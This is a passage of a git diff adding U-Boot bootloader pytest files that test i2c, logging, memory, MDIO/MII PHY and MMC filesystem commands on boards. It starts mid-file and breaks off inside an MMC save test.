expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_eeprom(ubman): + f = ubman.config.env.get("env__i2c_eeprom_device_test", None) + if not f: + pytest.skip("No I2C eeprom to test!") + + bus = f.get("bus", 0) + if bus < 0: + pytest.fail("No bus specified via env__i2c_eeprom_device_test!") + + addr = f.get("eeprom_addr", -1) + if addr < 0: + pytest.fail("No eeprom address specified via env__i2c_eeprom_device_test!") + + value = f.get("eeprom_val") + if not value: + pytest.fail( + "No eeprom configured value provided via env__i2c_eeprom_device_test!" + ) + + # Enable i2c mux bridge + ubman.run_command("i2c dev %x" % bus) + ubman.run_command("i2c probe") + output = ubman.run_command("i2c md %x 0 5" % addr) + assert value in output + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe_all_buses(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = ubman.run_command("i2c bus") + assert expected_response in response + + # Get all the bus list + if probe: + buses = re.findall("Bus (.+?):", response) + bus_list = [int(x) for x in buses] + + for dev in bus_list: + expected_response = f"Setting bus to {dev}" + response = ubman.run_command(f"i2c dev {dev}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = ubman.run_command("i2c probe") + assert expected_response in response diff --git a/test/py/tests/test_kconfig.py b/test/py/tests/test_kconfig.py new file mode 100644 index 00000000000..0c261d47975 --- /dev/null +++ b/test/py/tests/test_kconfig.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_kconfig' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_kconfig(ubman): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + + # This detects build errors in test/lib/kconfig.c + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' in out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +def test_kconfig_spl(ubman): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + + # This detects build errors in test/lib/kconfig_spl.c + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox_spl', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + + # There is no CONFIG_SPL_TEST_KCONFIG, so the CONFIG_IF_ENABLED_INT() + # line should not generate an error + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' not in out diff --git a/test/py/tests/test_log.py b/test/py/tests/test_log.py new file mode 100644 index 00000000000..4558b037e2a --- /dev/null +++ b/test/py/tests/test_log.py @@ -0,0 +1,49 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests U-Boot logging. It uses the 'log test' command with various options +and checks that the output is correct. +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_log') +def test_log_format(ubman): + """Test the 'log format' and 'log rec' commands""" + def run_with_format(fmt, expected_output): + """Set up the log format and then write a log record + + Args: + fmt: Format to use for 'log format' + expected_output: Expected output from the 'log rec' command + """ + output = ubman.run_command('log format %s' % fmt) + assert output == '' + output = ubman.run_command('log rec arch notice file.c 123 func msg') + assert output == expected_output + + with ubman.log.section('format'): + pad = int(ubman.config.buildconfig.get('config_logf_func_pad')) + padding = ' ' * (pad - len('func')) + + run_with_format('all', f'NOTICE.arch,file.c:123-{padding}func() msg') + output = ubman.run_command('log format') + assert output == 'Log format: clFLfm' + + run_with_format('fm', f'{padding}func() msg') + run_with_format('clfm', f'NOTICE.arch,{padding}func() msg') + run_with_format('FLfm', f'file.c:123-{padding}func() msg') + run_with_format('lm', 'NOTICE. msg') + run_with_format('m', 'msg') + +@pytest.mark.buildconfigspec('debug_uart') +@pytest.mark.boardspec('sandbox') +def test_log_dropped(ubman): + """Test dropped 'log' message when debug_uart is activated""" + + ubman.restart_uboot() + output = ubman.get_spawn_output().replace('\r', '') + assert (not 'debug: main' in output) diff --git a/test/py/tests/test_lsblk.py b/test/py/tests/test_lsblk.py new file mode 100644 index 00000000000..babd4f9528b --- /dev/null +++ b/test/py/tests/test_lsblk.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('blk') +@pytest.mark.buildconfigspec('cmd_lsblk') +def test_lsblk(ubman): + """Test that `lsblk` prints a result which includes `host`.""" + output = ubman.run_command('lsblk') + assert "Block Driver" in output + assert "sandbox_host_blk" in output diff --git a/test/py/tests/test_md.py b/test/py/tests/test_md.py new file mode 100644 index 00000000000..5c7bcbd420b --- /dev/null +++ b/test/py/tests/test_md.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md(ubman): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + + ram_base = utils.find_ram_base(ubman) + addr = '%08x' % ram_base + val = 'a5f09876' + expected_response = addr + ': ' + val + ubman.run_command('mw ' + addr + ' 0 10') + response = ubman.run_command('md ' + addr + ' 10') + assert(not (expected_response in response)) + ubman.run_command('mw ' + addr + ' ' + val) + response = ubman.run_command('md ' + addr + ' 10') + assert(expected_response in response) + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md_repeat(ubman): + """Test command repeat (via executing an empty command) operates correctly + for "md"; the command must repeat and dump an incrementing address.""" + + ram_base = utils.find_ram_base(ubman) + addr_base = '%08x' % ram_base + words = 0x10 + addr_repeat = '%08x' % (ram_base + (words * 4)) + ubman.run_command('md %s %x' % (addr_base, words)) + response = ubman.run_command('') + expected_response = addr_repeat + ': ' + assert(expected_response in response) diff --git a/test/py/tests/test_mdio.py b/test/py/tests/test_mdio.py new file mode 100644 index 00000000000..5345f1f4c40 --- /dev/null +++ b/test/py/tests/test_mdio.py @@ -0,0 +1,79 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the PHY device info including the device name, address, register address/value +and write data value. This test will be automatically skipped without this. + +For example: + +# Setup env__mdio_util_test to set the PHY address, device names, register +# address, register address value, and write data value to test mdio commands. +# Test will be skipped if env_mdio_util_test is not set +env__mdio_util_test = { + "eth0": {"phy_addr": 0xc, "device_name": "TI DP83867", "reg": 0, + "reg_val": 0x1000, "write_val": 0x100}, + "eth1": {"phy_addr": 0xa0, "device_name": "TI DP83867", "reg": 1, + "reg_val": 0x2000, "write_val": 0x100}, +} +""" + +def get_mdio_test_env(ubman): + f = ubman.config.env.get("env__mdio_util_test", None) + if not f or len(f) == 0: + pytest.skip("No PHY device to test!") + else: + return f + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_list(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = val.get("phy_addr") + dev_name = val.get("device_name") + + assert f"{phy_addr:x} -" in output + assert dev_name in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_read(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_write(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + wr_val = hex(val.get("write_val")) + + ubman.run_command(f"mdio write {phy_addr} {reg} {wr_val}") + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {wr_val}" in output + + ubman.run_command(f"mdio write {phy_addr} {reg} {reg_val}") + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output diff --git a/test/py/tests/test_memtest.py b/test/py/tests/test_memtest.py new file mode 100644 index 00000000000..0340edbea5a --- /dev/null +++ b/test/py/tests/test_memtest.py @@ -0,0 +1,68 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the memory test parameters such as start address, memory size, pattern, +iterations and timeout. This test will be automatically skipped without this. + +For example: + +# Setup env__memtest to set the start address of the memory range, size of the +# memory range to test from starting address, pattern to be written to memory, +# number of test iterations, and expected time to complete the test of mtest +# command. start address, size, and pattern parameters value should be in hex +# and rest of the params value should be integer. +env__memtest = { + 'start_addr': 0x0, + 'size': 0x1000, + 'pattern': 0x0, + 'iteration': 16, + 'timeout': 50000, +} +""" + +def get_memtest_env(ubman): + f = ubman.config.env.get("env__memtest", None) + if not f: + pytest.skip("memtest is not enabled!") + else: + start = f.get("start_addr", 0x0) + size = f.get("size", 0x1000) + pattern = f.get("pattern", 0x0) + iteration = f.get("iteration", 2) + timeout = f.get("timeout", 50000) + end = hex(int(start) + int(size)) + return start, end, pattern, iteration, timeout + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_negative(ubman): + """Negative testcase where end address is smaller than starting address and + pattern is invalid.""" + start, end, pattern, iteration, timeout = get_memtest_env(ubman) + expected_response = "Refusing to do empty test" + response = ubman.run_command( + f"mtest 2000 1000 {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = ubman.run_command("echo $?") + assert not output.endswith("0") + ubman.run_command(f"mtest {start} {end} 'xyz' {hex(iteration)}") + output = ubman.run_command("echo $?") + assert not output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_ddr(ubman): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + start, end, pattern, iteration, timeout = get_memtest_env(ubman) + expected_response = f"Tested {str(iteration)} iteration(s) with 0 errors." + with ubman.temporary_timeout(timeout): + response = ubman.run_command( + f"mtest {start} {end} {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = ubman.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mii.py b/test/py/tests/test_mii.py new file mode 100644 index 00000000000..e282add5ee8 --- /dev/null +++ b/test/py/tests/test_mii.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__mii_deive_test_skip to True if tests with ethernet PHY devices +# should be skipped. For example: Missing PHY device +env__mii_device_test_skip = True + +# Setup env__mii_device_test to set the MII device names. Test will be skipped +# if env_mii_device_test is not set +env__mii_device_test = { + 'device_list': ['eth0', 'eth1'], +} +""" + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_info(ubman): + if ubman.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + expected_output = "PHY" + output = ubman.run_command("mii info") + if not re.search(r"PHY (.+?):", output): + pytest.skip("PHY device does not exist!") + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_list(ubman): + if ubman.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + + f = ubman.config.env.get("env__mii_device_test", None) + if not f: + pytest.skip("No MII device to test!") + + dev_list = f.get("device_list") + if not dev_list: + pytest.fail("No MII device list provided via env__mii_device_test!") + + expected_output = "Current device" + output = ubman.run_command("mii device") + mii_devices = ( + re.search(r"MII devices: '(.+)'", output).groups()[0].replace("'", "").split() + ) + + assert len([x for x in dev_list if x in mii_devices]) == len(dev_list) + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_set_device(ubman): + test_mii_list(ubman) + f = ubman.config.env.get("env__mii_device_test", None) + dev_list = f.get("device_list") + output = ubman.run_command("mii device") + current_dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + + for dev in dev_list: + ubman.run_command(f"mii device {dev}") + output = ubman.run_command("echo $?") + assert output.endswith("0") + + ubman.run_command(f"mii device {current_dev}") + output = ubman.run_command("mii device") + dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + assert current_dev == dev + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_read(ubman): + test_mii_list(ubman) + output = ubman.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + ubman.run_command(f"mii read {eth_addr} 0") + output = ubman.run_command("echo $?") + assert output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_dump(ubman): + test_mii_list(ubman) + expected_response = "PHY control register" + output = ubman.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + response = ubman.run_command(f"mii dump {eth_addr} 0") + assert expected_response in response + output = ubman.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mmc.py b/test/py/tests/test_mmc.py new file mode 100644 index 00000000000..e751a3bd36a --- /dev/null +++ b/test/py/tests/test_mmc.py @@ -0,0 +1,740 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test MMC file system cases (fat32, ext2, ext4), +MMC device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the MMC device is not detected. + +For example: + +# Setup env__mmc_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for MMC device. +env__mmc_device_test_skip = False + +# Setup env__mmc_device to set the supported mmc modes to be tested +env__mmc_device { + 'mmc_modes': ['MMC_LEGACY', 'SD_HS'], +} + +""" + +mmc_set_up = False +controllers = 0 +devices = {} +mmc_modes_name = [] +mmc_modes = [] + +def setup_mmc_modes(ubman): + global mmc_modes, mmc_modes_name + f = ubman.config.env.get('env__mmc_device', None) + if f: + mmc_modes_name = f.get('mmc_modes', None) + + # Set mmc mode to default mode (legacy), if speed mode config isn't enabled + if ubman.config.buildconfig.get('config_mmc_speed_mode_set', 'n') != 'y': + mmc_modes = [0] + return + + if mmc_modes_name: + mmc_help = ubman.run_command('mmc -help') + m = re.search(r"\[MMC_LEGACY(.*\n.+])", mmc_help) + modes = [ + x.strip() + for x in m.group() + .replace('\n', '') + .replace('[', '') + .replace(']', '') + .split(',') + ] + + for mode in mmc_modes_name: + mmc_modes += [modes.index(mode)] + else: + # Set mmc mode to default mode (legacy), if it is not defined in env + mmc_modes = [0] + +def setup_mmc(ubman): + if ubman.config.env.get('env__mmc_device_test_skip', True): + pytest.skip('MMC device test is not enabled') + + setup_mmc_modes(ubman) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_list(ubman): + setup_mmc(ubman) + output = ubman.run_command('mmc list') + if 'No MMC device available' in output: + pytest.skip('No SD/MMC/eMMC controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No SD/MMC card present') + + array = output.split() + global devices + global controllers + controllers = int(len(array) / 2) + for x in range(0, controllers): + y = x * 2 + devices[x] = {} + devices[x]['name'] = array[y] + + global mmc_set_up + mmc_set_up = True + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + fail = 0 + for x in range(0, controllers): + devices[x]['detected'] = 'yes' + + for y in mmc_modes: + output = ubman.run_command('mmc dev %d 0 %d' % x, y) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'no mmc device at slot' in output: + devices[x]['detected'] = 'no' + + if 'MMC: no card present' in output: + devices[x]['detected'] = 'no' + + if fail: + pytest.fail('Card not present') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmcinfo(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + output = ubman.run_command('mmcinfo') + if 'busy timeout' in output: + pytest.skip('No SD/MMC/eMMC device present') + + assert mmc_modes_name[mmc_modes.index(y)] in output + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + devices[x]['capacity'] = capacity + print('Capacity of dev %d is: %g GiB' % (x, capacity)) + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + + output = ubman.run_command('mmc info') + assert mmc_modes_name[mmc_modes.index(y)] in output + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + if devices[x]['capacity'] != capacity: + pytest.fail("MMC capacity doesn't match mmcinfo") + + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + output = ubman.run_command('mmc rescan') + if output: + pytest.fail('mmc rescan has something to check') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_part(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + ubman.run_command('mmc dev %d' % x) + output = ubman.run_command('mmc part') + + lines = output.split('\n') + part_fat = [] + part_ext2 = [] + part_ext4 = [] + for line in lines: + obj = re.search( + r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type in ['0c', '0b', '0e']: + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext(2/4) detected') + output = ubman.run_command( + 'fstype mmc %d:%d' % x, part_id + ) + if 'ext2' in output: + part_ext2.append(part_id) + elif 'ext4' in output: + part_ext4.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % x) + devices[x]['ext4'] = part_ext4 + devices[x]['ext2'] = part_ext2 + devices[x]['fat'] = part_fat + + if not part_ext2 and not part_ext4 and not part_fat: + pytest.fail('No partition detected on device %d' % x) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +def test_mmc_fatls_fatinfo(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + output = ubman.run_command( + 'fatls mmc %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + output = ubman.run_command( + 'fatinfo mmc %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fatload_fatwrite(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = utils.find_ram_base(ubman) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + # do write + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = ubman.run_command( + '%swrite mmc %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + ubman.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 1024, alignment) + output = ubman.run_command( + '%sload mmc %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_mmc_ext4ls(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + output = ubman.run_command( + '%sls mmc %d:%s' % (fs, x, part) + ) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext4load_ext4write(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = utils.find_ram_base(ubman) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + + # do write + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = ubman.run_command( + '%swrite mmc %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_mmc_ext2ls(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + output = ubman.run_command( + '%sls mmc %d:%s' % (fs, x, part) + ) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext2load(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_ls(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for fs in ['fat', 'ext4', 'ext2']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + output = ubman.run_command('ls mmc %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_load(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for fs in ['fat', 'ext4', 'ext2']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'load mmc %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_save(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for fs in ['fat', 'ext4', 'ext2']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = 0 + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'save mmc %d:%s %x /%s %d' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d 